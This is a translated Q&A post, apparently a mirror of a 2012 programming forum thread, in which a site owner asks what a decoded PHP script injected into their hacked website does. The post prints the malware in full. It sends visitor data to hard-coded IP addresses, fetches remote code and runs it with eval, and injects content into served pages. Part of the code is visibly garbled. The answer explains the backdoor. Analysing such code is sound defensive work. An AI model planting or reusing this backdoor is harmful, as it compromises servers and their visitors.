有人能告诉我更多关于这个恶意脚本的信息吗

时间:2012-03-17 15:41:51

标签: php code-analysis malware

前几天,这是在黑客攻击中注入我的网站,我解密了它并得到了这个: 有人能告诉我它的作用吗?

编辑:不要去IP地址,它们也可能是恶意的。

if (!function_exists(GetMama)){
    function opanki($buf){
        global $god_mode;
        str_replace("href","href",strtolower($buf),$cnt_h);
        str_replace(" 2)&&($cnt_x == 0)) {
            $buf = $god_mode . $buf;
        } return $buf;
    }

    function GetMama(){
        $mother = "www.imp3.me";
        return $mother;
    }

    ob_start("opanki");
    $show = false;

    function ahfudflfzdhfhs($pa){
        global $show;
        global $god_mode;
        $mama = GetMama();

        $file = urlencode(__FILE__);
        if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        }
        if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        }
        if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        }
        if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        }

        $url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;

        if( function_exists("curl_init") ){
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            $ult = curl_exec($ch);
        } else {
            $ult = @file_get_contents($url);
        }
        if (strpos($ult,"eval") !== false){
            $z = str_replace("eval","",$ult);
            eval($z);
            $show = true;
            return true;
        }
        if (strpos($ult,"ebna") !== false){
            $z = str_replace("ebna","",$ult);
            $god_mode = $z;
            $show = true;
            return true;
        } else {
            return false;
        }
    }

    $father[] = "146.185.254.245";
    $father[] = "31.184.242.103";
    $father[] = "91.196.216.148";
    $father[] = "91.196.216.49";

    foreach($father as $ur){
        if ( ahfudflfzdhfhs($ur) ) { break ;}
    }
    if ($show === false){
        $script='';
        $god_mode = $script;
    }
}

1 个答案:

答案 0 :(得分:3)

从所列出的IP地址中提取(file_get_contents)一个文件并执行(eval)该文件,该文件可以是任何内容。在您的服务器上放置更多文件,寻找其他漏洞,发送垃圾邮件,托管恶意软件......任何事情。